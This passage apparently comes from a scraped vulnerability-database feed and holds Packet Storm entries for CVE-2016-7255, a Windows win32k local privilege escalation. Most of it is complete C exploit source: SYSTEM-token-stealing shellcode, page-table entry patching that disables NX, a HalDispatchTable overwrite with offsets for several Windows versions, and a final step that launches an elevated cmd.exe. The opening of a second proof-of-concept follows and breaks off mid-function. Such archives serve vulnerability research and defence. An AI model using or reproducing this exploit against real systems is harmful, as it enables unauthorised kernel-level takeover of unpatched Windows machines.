\n \n// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255 \n// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n#pragma comment(lib, \"advapi32\") \n \nUINT64 PML4_BASE; \nUINT PML4_SELF_REF_INDEX; \nUINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68; \n \n#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) \n#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) \n#define GET_INDEX(va) ( ((va >> 39) & 0x1ff )) \n \n//////////////////////////////////////////////////////// \n// Define Data Types \n//////////////////////////////////////////////////////// \ntypedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { \nPVOID Unknown1; \nPVOID Unknown2; \nPVOID Base; \nULONG Size; \nULONG Flags; \nUSHORT Index; \nUSHORT NameLength; \nUSHORT LoadCount; \nUSHORT PathLength; \nCHAR ImageName[256]; \n} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; \n \ntypedef struct _SYSTEM_MODULE_INFORMATION { \nULONG Count; \nSYSTEM_MODULE_INFORMATION_ENTRY Module[1]; \n} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; \n \ntypedef enum _SYSTEM_INFORMATION_CLASS { \nSystemModuleInformation = 11, \nSystemHandleInformation = 16 \n} SYSTEM_INFORMATION_CLASS; \n \ntypedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass, \nOUT PVOID SystemInformation, \nIN ULONG SystemInformationLength, \nOUT PULONG ReturnLength); \n \ntypedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, \nOUT PULONG Interval); \n \nNtQuerySystemInformation_t NtQuerySystemInformation; \nNtQueryIntervalProfile_t NtQueryIntervalProfile; \n \nchar shellcode[] = { \n//0xcc, \n0xfa, // CLI \n0x9c, // PUSHFQ \n0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer 
\n0x50, // PUSH RAX \n0x51, // PUSH RCX \n0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] \n0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX \n0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID \n0x53, // PUSH RBX \n \n0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 \n0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS \n0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] \n//<tag> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 \n0x75, 0xf3, // JNE <tag> \n0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM \n \n0x53, // PUSH RBX \n//<tag2> \n0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] \n0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID \n0x39, 0xcb, // CMP EBX, ECX // our PID \n0x75, 0xf5, // JNE <tag2> \n0x5b, // POP RBX \n0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX \n \n0x5b, // POP RBX \n0x59, // POP RCX \n0x58, // POP RAX \n0x9d, // POPFQ \n \n0xfb, // STI \n0xff, 0xe0 // JMP RAX \n}; \n \nULONG __cdecl DbgPrint(__in char* Format, ...) 
\n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList = NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR)); \n \nva_start(VaList, Format); \n \n_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList); \n \n \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree(GetProcessHeap(), 0, pszDbgBuff); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = { 0 }; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1, &stInput, sizeof(stInput)); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down(VK_MENU); \n_sim_key_down(VK_SHIFT); \n \n \nfor (i = 0; i < nCount; i++) \n{ \n_sim_key_down(VK_TAB); \n_sim_key_up(VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up(VK_MENU); \n_sim_key_up(VK_SHIFT); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \nint _sim_alt_esc(int count) \n{ \nint i = 0; \n \nfor (i = 0; i<count; i++) \n{ \n_sim_key_down(VK_MENU); \n//_sim_key_down(VK_SHIFT); \n \n \n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n 
\n_sim_key_down(VK_ESCAPE); \n_sim_key_up(VK_ESCAPE); \n \n_sim_key_up(VK_MENU); \n//_sim_key_up(VK_SHIFT); \n \n} \n \nreturn 0; \n} \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = { 0 }; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName = L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = { 0 }; \n \nUINT64 value = 0; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif (0 == RegisterClassExW(&stWC)) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ((UCHAR*)pAddress - 0x28); \n#else \npId = ((UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId); \n \nDbgPrint(\"hWndChild = 0x%p\\n\", hWndChild); \n \nShowWindow(hWndParent, SW_SHOWNORMAL); \n \nSetParent(hWndChild, GetDesktopWindow()); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild, TRUE); \n \n_sim_alt_shift_esc(); \n \nwhile (GetMessage(&stMsg, NULL, 0, 0)) { \n \nSetFocus(hWndParent); \n_sim_alt_esc(20); \nSetFocus(hWndChild); \n_sim_alt_esc(20); \n \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n \nif (value != 0) { \nbreak; \n} \n \n \n__try { \nvalue = *(UINT64 *)PML4_SELF_REF; \nif ((value & 0x67) == 0x67) { \nprintf(\"Value Self Ref = %llx\\n\", value); \nbreak; \n} \n} \n__except (EXCEPTION_EXECUTE_HANDLER) { \ncontinue; \n} \n \n} \n \n \n} while (FALSE); 
\n \nif (NULL != hWndParent) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif (NULL != hWndChild) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName, GetModuleHandleW(NULL)); \n \nreturn 0; \n} \n \nUINT64 get_pxe_address(UINT64 address) { \nUINT entry = PML4_SELF_REF_INDEX; \nUINT64 result = address >> 9; \nUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39); \nUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8; \nresult = result | lower_boundary; \nresult = result & upper_boundary; \nreturn result; \n} \n \nUINT64 look_free_entry_pml4(void) { \n// Looks for a free pml4e in the last 0x100 bytes of the PML4 \nint offset = 0xF00; \nUINT64 pml4_search = PML4_BASE + offset; \nwhile (offset < 0xFF8) \n{ \nif ((*(PVOID *)pml4_search) == 0x0) \n{ \n// This is a NULL (free) entry \nbreak; \n} \noffset += 8; \npml4_search = PML4_BASE + offset; \n} \nreturn pml4_search; \n} \n \nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) { \nUINT64 index = (spurious_offset & 0xFFF) / 8; \nUINT64 result = ( \n((UINT64)0xFFFF << 48) | \n((UINT64)PML4_SELF_REF_INDEX << 39) | \n((UINT64)PML4_SELF_REF_INDEX << 30) | \n((UINT64)PML4_SELF_REF_INDEX << 21) | \n(index << 12) \n); \nreturn result; \n} \n \n \n \nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) { \n \n/* \n1: kd> !pte ffffffff`ffd00000 \nVA ffffffffffd00000 \nPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800 \ncontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963 \npfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V \n*/ \n \nUINT64 pte = get_pxe_address(virtual_address); \nint pte_offset = pte & 0xFFF; \n//printf(\"PTE: %llx, %x\\n\", pte, pte_offset); \n \nUINT64 pde = get_pxe_address(pte); \nint pde_offset = 
pde & 0xFFF; \n//printf(\"PDE: %llx, %x\\n\", pde, pde_offset); \n \nUINT64 pdpte = get_pxe_address(pde); \nint pdpte_offset = pdpte & 0xFFF; \n//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset); \n \nUINT64 pml4e = get_pxe_address(pdpte); \nint pml4e_offset = pml4e & 0xFFF; \n//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset); \n \nUINT64 spurious_offset = look_free_entry_pml4(); \nprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset); \nUINT64 f_e_pml4 = spurious_offset; \nUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset); \nprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt); \nprintf(\"--------------------------------------------------\\n\\n\"); \n \n \n//Read the physical address of pml4e \nUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e); \nprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn); \n// Change the PxE \npml4e_pfn = pml4e_pfn | 0x67; // Set U/S \n \nprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pdpte \nUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset); \nprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn); \n// Change the PxE \npdpte_pfn = pdpte_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pde \nUINT64 pde_addr = spurious_pt + pde_offset; \nUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset); \nprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn); \n// Change the PxE \npde_pfn = pde_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pde_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical 
address of pte \nUINT64 pte_addr = spurious_pt + pte_offset; \nUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset); \nprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn); \n// Change the PxE \npte_pfn = pte_pfn | 0x67; // Set U/S \npte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \nif (patch_original) { \nprintf(\"*** Patching the original location to enable NX...\\n\"); \n*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn; \n} \n \nprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \nprintf(\"\\n\\n\"); \nreturn spurious_pt; \n} \n \nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) { \nprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address); \nUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteAddress += (target_address & 0xFFF); \nprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress); \nreturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset)); \n} \n \nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) { \nUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteTarget += (target_address & 0xFFF); \nUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset; \nprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address); \n*(PVOID *)target = (PVOID)hook_address; \n} \n \n \nUINT64 store_shellcode_in_hal(void) { \n//// Finally store the shellcode on the HAL \n \nUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000; \nUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE); \n \nprintf(\"HAL address: %llx\\n\", hal_heap); \n// 0xffffffffffd00d50 this is a good offset to store shellcode \n// 0xfff - 0xd50 = 0x2af space \n \nmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode)); \nreturn 
0xffffffffffd00d50; \n} \n \nUINT64 GetHalDispatchTable() { \nPCHAR KernelImage; \nSIZE_T ReturnLength; \nHMODULE hNtDll = NULL; \nUINT64 HalDispatchTable; \nHMODULE hKernelInUserMode = NULL; \nPVOID KernelBaseAddressInKernelMode; \nNTSTATUS NtStatus = STATUS_UNSUCCESSFUL; \nPSYSTEM_MODULE_INFORMATION pSystemModuleInformation; \n \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\"); \n \nif (!NtQuerySystemInformation) { \nprintf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); \n \n// Allocate the Heap chunk \npSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), \nHEAP_ZERO_MEMORY, \nReturnLength); \n \nif (!pSystemModuleInformation) { \nprintf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, \npSystemModuleInformation, \nReturnLength, \n&ReturnLength); \n \nif (NtStatus != STATUS_SUCCESS) { \nprintf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nKernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base; \nKernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1; \n \nprintf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage); \nprintf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode); \n \nhKernelInUserMode = LoadLibraryA(KernelImage); \n \nif (!hKernelInUserMode) { \nprintf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \n// This is still 
in user mode \nHalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\"); \n \nif (!HalDispatchTable) { \nprintf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nelse { \nHalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode; \n \n// Here we get the address of HapDispatchTable in Kernel mode \nHalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode); \nprintf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable); \n} \n \nHeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); \n \nif (hNtDll) { \nFreeLibrary(hNtDll); \n} \n \nif (hKernelInUserMode) { \nFreeLibrary(hKernelInUserMode); \n} \n \nhNtDll = NULL; \nhKernelInUserMode = NULL; \npSystemModuleInformation = NULL; \n \nreturn HalDispatchTable; \n} \n \nint __cdecl main(int argc, char** argv) \n{ \nTCHAR pre_username[256]; \nTCHAR post_username[256]; \nDWORD size = 256; \nULONG Interval = 0; \nHMODULE hNtDll = NULL; \nUINT retval; \nUINT64 overwrite_address; \nint overwrite_offset; \n \n// define operating system version specific variables \nunsigned char sc_KPROCESS; \nunsigned int sc_TOKEN; \nunsigned int sc_APLINKS; \nint osversion; \n \nif (argc != 2) { \nprintf(\"Please enter an OS version\\n\"); \nprintf(\"The following OS'es are supported:\\n\"); \nprintf(\"\\t[*] 7 - Windows 7\\n\"); \nprintf(\"\\t[*] 81 - Windows 8.1\\n\"); \nprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\"); \nprintf(\"\\t[*] 12 - Windows 2012 R2\\n\"); \nprintf(\"\\n\"); \nprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\"); \nreturn -1; \n} \n \nosversion = _strtoui64(argv[1], NULL, 10); \n \nif(osversion == 7) \n{ \n// the target machine's OS is Windows 7 SP1 \nprintf(\" [+] Windows 7 SP1\\n\"); \nsc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 
0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80) \nsc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = GetHalDispatchTable(); // HalDispatchTable \noverwrite_offset = 0x8; // QueryIntervalProfile \n} \nelse if(osversion == 81) \n{ \n// the target machine's OS is Windows 8.1 \nprintf(\" [+] Windows 8.1\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 10) \n{ \n// the target machine's OS is Windows 10 prior to build 14393 \nprintf(\" [+] Windows 10\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 12) \n{ \n// the target machine's OS is Windows 2012 R2 \nprintf(\" [+] Windows 2012 R2\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; 
// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \n// in case the OS version is not any of the previously checked versions \nelse \n{ \nprintf(\" [-] Unsupported version\\n\"); \nprintf(\" [*] Affected 64-bit operating systems\\n\"); \nprintf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\"); \nprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\"); \nprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\"); \nprintf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\"); \nreturn -1; \n} \n \nprintf(\"My PID is: %d\\n\", GetCurrentProcessId()); \nGetUserName(pre_username, &size); \nprintf(\"Current Username: %s\\n\", pre_username); \nprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF); \nprintf(\"Shellcode stored at: %p\\n\", (void *) &shellcode); \nprintf(\"Enter to continue...\\n\"); \ngetchar(); \n \ndo \n{ \nor_address_value_4((void*)PML4_SELF_REF); \n} while (FALSE); \n \nPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF); \nprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX); \nPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000); \n \nUINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset); \n \nprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer); \nDWORD pid = GetCurrentProcessId(); \n \n/* Shellcode Patching !! 
*/ \nchar *p = shellcode; \np += 4; // skip the CLI, PUSHF and MOV RAX bytes \n*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1 \n \np += 12; // Patch shellcode with original value in the Overwrite address \n*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset); \n \np += 12; // To patch the PID of our process \n \n*(DWORD *)p = (DWORD)pid; \n \np += 17; \n*(unsigned char *)p = (unsigned char)sc_KPROCESS; \n \np += 7; \n*(unsigned int *)p = (unsigned int)sc_APLINKS; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \nUINT64 shellcode_va = store_shellcode_in_hal(); \nprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va); \noverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset); \n \nif (osversion == 7){ \n// Exploit Win7.1 \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\"); \n \nif (!NtQueryIntervalProfile) { \nprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtQueryIntervalProfile(0x1337, &Interval); \n} \n \n \nwhile (1) { \nsize = 256; \nGetUserName(post_username, &size); \nif (memcmp(post_username, pre_username, 256) != 0) break; \n} \nSleep(2000); \nsystem(\"cmd.exe\"); \n \n \nreturn 0; \n} \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140468/ms16135-escalate.txt"}, {"lastseen": "2016-12-05T22:16:40", "description": "", "published": "2016-11-14T00:00:00", "type": "packetstorm", "title": "Microsoft Windows kernel win32k Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-14T00:00:00", "id": 
"PACKETSTORM:139701", "href": "https://packetstormsecurity.com/files/139701/Microsoft-Windows-kernel-win32k-Denial-Of-Service.html", "sourceData": "`/* \nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \nFull Proof of Concept: \n \nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip \n \n******************************************************************** \nCreated: 2016-11-09 14:23:09 \nFilename: main.c \nAuthor: root[at]TinySec.net \nVersion 0.0.0.1 \nPurpose: poc of cve-2016-0075 \n********************************************************************* \n*/ \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n \n////////////////////////////////////////////////////////////////////////// \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n \n#undef DbgPrint \nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); \nULONG __cdecl DbgPrint(__in char* Format, ...) 
\n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList=NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); \n \nva_start(VaList,Format); \n \n_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); \n \nDbgPrintEx(77 , 0 , pszDbgBuff ); \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree( GetProcessHeap(), 0 , pszDbgBuff ); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 